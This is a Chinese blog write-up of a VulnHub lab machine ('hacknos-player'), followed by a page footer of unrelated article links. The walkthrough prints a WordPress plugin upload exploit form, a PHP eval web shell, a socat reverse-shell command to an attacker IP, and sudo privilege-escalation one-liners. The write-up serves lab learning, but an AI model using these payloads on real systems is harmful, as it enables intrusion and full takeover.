hacknos-player靶机渗透
靶机下载地址https://www.vulnhub.com/entry/hacknos-player,459/
网络配置
该靶机可能会存在无法自动分配IP的情况,所以无法扫描到的情况下需要手动配置获取IP地址。按照链接中的操作进行IP分配https://blog.csdn.net/asstart/article/details/103433065?utm_source=app
开机按e进入此界面修改指定内容为rw signie init=/bin/bash
完成后Ctrl+X进入shell界面
然后使用dhclient命令获取IP,再次查看IP
此时已经成功出现IP,重启即可。
前期摸排
打开发现是apache的默认页面
端口扫描发现2个端口开放,先尝试下爆破3306端口
爆破时出现大量错误信息,该错误信息说明mysql设置了失败连接次数,导致了MySQL无条件强制阻止我们连接。看来mysql无果,只能尝试80端口了。
使用dirsearch扫目录
dirsearch.py -u "http://192.168.245.171/" -e * -r -R 3
没发现有价值的东西,之后尝试了hackNos、player、Rahul_Gehlaut各种组合来猜解目录也没发现有新的目录存在,我还是太菜了。换了个思路,既然作者只留了80端口有效,那么在80端口上一定有我疏忽的地方,果不其然,在默认页面中发现了网站根目录
众里寻它千百度 蓦然回首 却在灯火阑珊处~。
发现是wordpross
直接wpscan一把梭,我的wpscan安装一直出现问题,直接使用了docker版本,这里因为docker装在了我的腾讯云上,我直接把靶机映射到了外网进行扫描,懒得安装了~
docker run -it --rm wpscanteam/wpscan --url http://xx.xx.xx/g@web/
扫描时发现存在有漏洞版本的插件
尝试枚举一下用户
docker run -it --rm wpscanteam/wpscan --url http://xx.xx.xx/g@web/ --enumerate u
发现一个可疑接口
http://192.168.245.171/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
打开url发现类型密码字符串hackNos@9012!!,先记下来
中期深入
我们直接在wpvulndb搜索该插件漏洞exp
https://wpvulndb.com/search?text=WP Support Plus Responsive Ticket System
选择一个远程代码执行的
可以看到漏洞成因为使用了switch case简单匹配了黑名单后缀导致可进行绕过,上传可执行文件
直接将exp copy下来修改提交地址
<form method="post" enctype="multipart/form-data" action="http://192.168.245.170/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
我们选择直接上传php一句话shell
<?php eval(@$_POST[1]);?>
上传成功
在上传目录中发现我们的shell,打开执行我们的命令。
这里我们使用socat反弹一个交互式shell
socat是类Unix系统下的一个工具,可以看作是 nc 的加强版。我们可以使用socat来传递完整的带有tty的TCP连接。
控制端:
socat file:`tty`,raw,echo=0 tcp-listen:8888
打开shell执行我们的命令
1=system("socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.170:8888");
可以看到右下角的控制端已经成功接收反弹的shell了
后期提权
使用sudo -l查看sudo权限,发现需要使用密码,尝试输入之前获取的密码,无果
切换home目录发现三个用户名,尝试使用密码hackNos@9012!!挨个登录
成功登录security用户
使用sudo -l 发现可以无密码以hacknos-boat权限执行find命令
这里我们直接使用gtfobins工具来查找使用二进制文件执行命令的payload
https://gtfobins.github.io/
find命令的-exec参数可以让我们前面处理过程中过滤出来的文件,使用command命令对其进行处理,我们直接执行/bin/bash
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \;
这时获得了hackNos-boat用户的权限,再次查看sudo权限,发现可以以hunter用户执行ruby,那么直接使用ruby -e 参数,-e的意思就是把后面的字符串当作脚本执行。
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash/"'
获取hunter权限后发现可以以root权限执行gcc命令,我们直接去gtfobins搜索
sudo -u root /usr/bin/gcc -wrapper /bin/bash,-s .
获取root权限成功,这个-wrapper参数没查到什么意思,有师傅知道的话可以告知下。
完结,有段时间没做过靶机渗透了,发现好多东西都忘了,写个文章记录一下防止忘记。加油~
hacknos-player靶机渗透的更多相关文章
- 22. CTF综合靶机渗透(十五)
靶机说明: Game of Thrones Hacking CTF This is a challenge-game to measure your hacking skills. Set in Ga ...
- 21. CTF综合靶机渗透(十四)
靶机说明: I created this machine to help others learn some basic CTF hacking strategies and some tools. ...
- 18. CTF综合靶机渗透(十一)
靶机描述: SkyDog Con CTF 2016 - Catch Me If You Can 难度:初学者/中级 说明:CTF是虚拟机,在虚拟箱中工作效果最好.下载OVA文件打开虚拟框,然后选择文件 ...
- 17. CTF综合靶机渗透(十)
靶机描述:欢迎来到超级马里奥主机!这个虚拟机是对真实世界场景场景的模拟.目标是在VM中找到2个标志.根是不够的(对不起!)VM可以以多种方式开发,但请记住枚举是关键.挑战的程度是中等的.感谢VDBAN ...
- VulnHub CengBox2靶机渗透
本文首发于微信公众号:VulnHub CengBox2靶机渗透,未经授权,禁止转载. 难度评级:☆☆☆☆官网地址:https://download.vulnhub.com/cengbox/CengB ...
- VulnHub PowerGrid 1.0.1靶机渗透
本文首发于微信公众号:VulnHub PowerGrid 1.0.1靶机渗透,未经授权,禁止转载. 难度评级:☆☆☆☆☆官网地址:https://download.vulnhub.com/power ...
- DeRPnStiNK靶机渗透
DeRPnStiNK靶机渗透 常规的信息搜集 扫到了phpmyadmin以及wordpress并在后台发现弱密码,即admin,admin 这里对wordpress进行了扫描: 扫描插件: searc ...
- BTRsys1~2系列靶机渗透
BTRsys系列靶机渗透 BTRsys1 端口发现加目录扫描. 发现目录:http://192.168.114.161/login.php 尝试弱密码失败,查看源代码. <script type ...
- ch4inrulz: 1.0.1靶机渗透
ch4inrulz: 1.0.1靶机渗透 扫描主机端口,还行啦四个开放的端口,8011和80端口都运行着web服务. 80端口下的robots.txt告诉我们什么都没有 在8011端口的apache服 ...
随机推荐
- JAVAEE学习day03,基本的流程控制
有问题请留言 1.流程控制语句分类 1)顺序控制语句 2)选择结构语句 if... if...else... if...else if... else... for... switch... whil ...
- windows 下载~安装nginx
nginx 中文文档 http://www.nginx.cn/doc/ 到nginx官网下载安装包http://nginx.org/en/download.html 解压安装包 进入windows的c ...
- forEach 循环数组 # for in 循环对象 key # for of 循环对象 value
forEach 循环数组 # for in 循环对象 key # for of 循环对象 value
- SpringBoot2整合Redis多数据源
配置文件属性 spring: redis: database: 1 host: 192.168.50.144 port: 6379 password: timeout: 600 #Springboot ...
- Swift 4.0 高级-自定义操作符
在Swift语言中,常见的操作符有+.-.*./.>.<.==.&&.||等等,如果不喜欢,你也可以定义自己喜欢的操作符. 操作符类型 中置运算符(infix operat ...
- Element没更新了?Element没更新,基于El的扩展库更新
think-vuele 基于Vue和ElementUI框架进行整合二次开发的一个框架.提供一些elementUI没有的或当时没有的控件.优化了或简化了便于2B软件开发的一些控件 demo:http:/ ...
- Java后台面试记录
腾讯一面: 总结:考基础和代码(网址A是不是网址B的子域) + SQL(选出重复邮箱)(以下是没回答上来的) 逻辑回归公式(简历上写了协同过滤) 详见:https://blog.csdn.net/ma ...
- Oracle job启动与关闭
--查看job下次执行时间以及间隔时间 select * from dba_jobs where job = '774'; --启动job exec dbms_job.run(774); --停用jo ...
- cmdb采集数据的版本
在局部配置文件中配置MODE=' agent',或者MODE=‘ssh’,或者MODE=‘’saltstack ', 实现只需要修改这个配置,就会使用对应的方案进行采集数据 第一种版本: 启动文件中 ...
- Mac下 eclipse target runtime com.genuitec.runtime 解决方法
Mac下 eclipse target runtime com.genuitec.runtime 解决方法 解决步骤如下: 首先是找到工程项目一个名叫.settings的文件夹,里面有个叫 org.e ...